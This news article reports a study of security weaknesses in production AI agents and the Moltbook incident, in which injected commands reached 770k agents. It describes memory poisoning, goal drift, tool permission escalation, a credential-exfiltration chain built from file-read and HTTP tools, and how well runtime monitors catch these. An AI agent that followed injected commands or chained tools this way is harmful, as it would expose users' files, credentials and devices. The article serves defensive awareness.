91% have vulnerabilities, 94% are susceptible to poisoning—AI agents' security is a complete mess

Autonomous AI Agents are rapidly infiltrating healthcare, finance, and enterprise operations, but the largest security research to date shows: the vast majority of Agents running in production environments have serious vulnerabilities, and current mainstream security assessment methods are almost powerless against them.

Recently, a joint research team from Stanford University, MIT CSAIL, Carnegie Mellon University, ITU Copenhagen, and NVIDIA found that among 847 evaluated autonomous intelligent agents deployed in production, 91% have toolchain attack vulnerabilities, 89.4% experience target drift after about 30 steps of execution, and 94% of memory-enhanced agents face “poisoning” risks. The study uncovered 2,347 previously unknown vulnerabilities, 23% of which were rated as severe.

First author Owen Sakawa cited the early 2026 “OpenClaw/Moltbook incident” to demonstrate that this threat has moved from theory into reality: a single vulnerability in the Moltbook platform database led to the compromise of 770k active AI Agents, each with privileged access to their users’ devices, emails, and files. “This is no longer a hypothetical threat,” Sakawa said.

This serves as a direct warning to enterprises and investors accelerating their deployment of AI Agents: current mainstream security assessment frameworks are based on stateless language models and cannot identify emergent combinatorial vulnerabilities in multi-step executions, meaning many companies may be systematically misjudging the true security status of their AI Agents. Gary Marcus, an expert in cognitive psychology and AI, commented, “Autonomous agents are a complete mess.”

Vulnerability Map: Six Attack Types, 2,347 Known Weaknesses

The research covers four major industries: healthcare (289 deployments, 34.1%), finance (247, 29.2%), customer service (198, 23.4%), and code generation (113, 13.3%).

The study established a six-category vulnerability classification system for autonomous agents, including target drift and instruction decay, desynchronization between planner and executor, tool permission escalation, memory poisoning, silent multi-step policy violations, and delegation failures.

In production environment assessments, state manipulation led with 612 instances (26.1%), followed by target drift with 573 instances (24.4%). Tool misuse and chain calls, though third in total count (489 instances), are the most severe—198 instances were rated as severe, the highest proportion among all categories.

Even more alarming are key figures: 67% of agents experience target drift after 15 steps, 84% cannot maintain security policies across sessions, 73% lack memory poisoning detection mechanisms, and 58% have timing consistency vulnerabilities. The study also found that the effects of memory poisoning typically take an average of 3.7 sessions to manifest after initial injection, greatly increasing the difficulty of security detection.

Real-world Case: 770k Agents Compromised Simultaneously

The OpenClaw (formerly Clawdbot and Moltbot) case provides the most direct real-world validation of the above threat model.

This open-source AI Agent, developed by Austrian developer Peter Steinberger and released in November 2025, accumulated over 160k GitHub stars within weeks. It can autonomously send emails, manage schedules, execute terminal commands, and deploy code, with persistent memory across sessions.

Security firm Astrix Security discovered, using their proprietary scanner ClawdHunter, that there are 42,665 OpenClaw instances on the public internet, with 8 fully open and unauthenticated.

According to VentureBeat, Cisco’s AI security research team described OpenClaw as “a breakthrough in capability but an absolute nightmare from a security perspective.” Kaspersky identified 512 vulnerabilities during a security audit in January 2026, 8 of which were severe.

The Moltbook incident is particularly illustrative.

This social platform, built specifically for OpenClaw Agents, spread virally and attracted over 770k Agent registrations—users informed Moltbook of their Agents, which then autonomously completed registration.

Subsequently, a database vulnerability allowed attackers to bypass authentication and inject commands directly into any Agent session, putting all 770k Agents—each with privileged access to user devices—at risk simultaneously. The research team characterized this as the first recorded large-scale cross-Agent attack propagation event.

Security researcher Simon Willison described the “lethal trifecta” in OpenClaw: access to private data, exposure to untrusted content, and communication channels—all combined to make autonomous agents an ideal springboard for attackers.

Architectural Flaws: Why AI Agents Are More Vulnerable Than LLMs

The core conclusion is that the security challenges of autonomous agents are fundamentally different from those of stateless language models.

Security assessments for language models focus on “whether the model can be made to produce unsafe content”; for AI Agents, the question becomes “whether the model can be made to do unsafe things”—including real-world tool calls, state modifications affecting future behavior, and executing plans that violate policies over multiple steps.

The study illustrates this logic with concrete scenarios: an agent with permissions to read files (read_file) and make HTTP requests (http_request), where each tool’s access control decision is compliant in isolation, but their combination enables data theft—reading credentials from configuration files and exfiltrating them via HTTP requests. Each step complies with local security policies, but the overall goal is adversarial. This phenomenon is termed “compositional safety.”

In controlled architecture studies, researchers tested four mainstream architectures: ReAct agents, multi-agent systems, memory-enhanced agents, and tool-using agents.

Results showed that permission escalation attacks on tool-using agents had a success rate of up to 95%, and poisoning attacks on memory-enhanced agents reached 94%.

Even the most resilient multi-agent systems had a 58% success rate against target drift attacks—leading researchers to conclude that all tested architectures currently lack sufficient defenses against adversarial deployment.

Further, adaptive attack generation tests showed that attacks generated via reinforcement learning had a violation success rate of 79%, a 25.4% increase over manually designed scenarios at 63%, indicating that the threat space for AI Agents exceeds the coverage of human red team testing.

Impact on Enterprise Deployment: Defense Frameworks Are Still Maturing

The research team proposed a minimum security baseline based on empirical results: all production Agents must deploy runtime monitoring; tools involved in data access and external communication should require manual approval; every 20–25 steps should trigger manual review to address target drift risks; memory-enhanced Agents should perform encrypted integrity checks on persistent states.

In terms of monitoring effectiveness, the study showed that action-level monitoring (single-step detection) achieved an accuracy of 0.94, sequence-level (multi-step behavior chains) F1 score was 0.85, and state-level monitoring F1 score was 0.83. During a 30-day runtime test of 127 production Agents, the system intercepted 4,782 operations with a false positive rate of 3.7%, and 14.6% of flagged operations were confirmed as genuine attacks.

The study also pointed out a fundamental misalignment in current “AI governance” approaches: most frameworks are post-hoc audits rather than real-time compliance enforcement during execution.

As regulations like the EU Artificial Intelligence Act and the US NIST AI Risk Management Framework are implemented, compliance pressures and security risks will rise in tandem. With AI Agents being deployed in high-risk business scenarios, the lack of security infrastructure is becoming a systemic risk in this AI commercialization wave.

View Original
This page may contain third-party content, which is provided for information purposes only (not representations/warranties) and should not be considered as an endorsement of its views by Gate, nor as financial or professional advice. See Disclaimer for details.
  • Reward
  • Comment
  • Repost
  • Share
Comment
Add a comment
Add a comment
No comments
  • Pin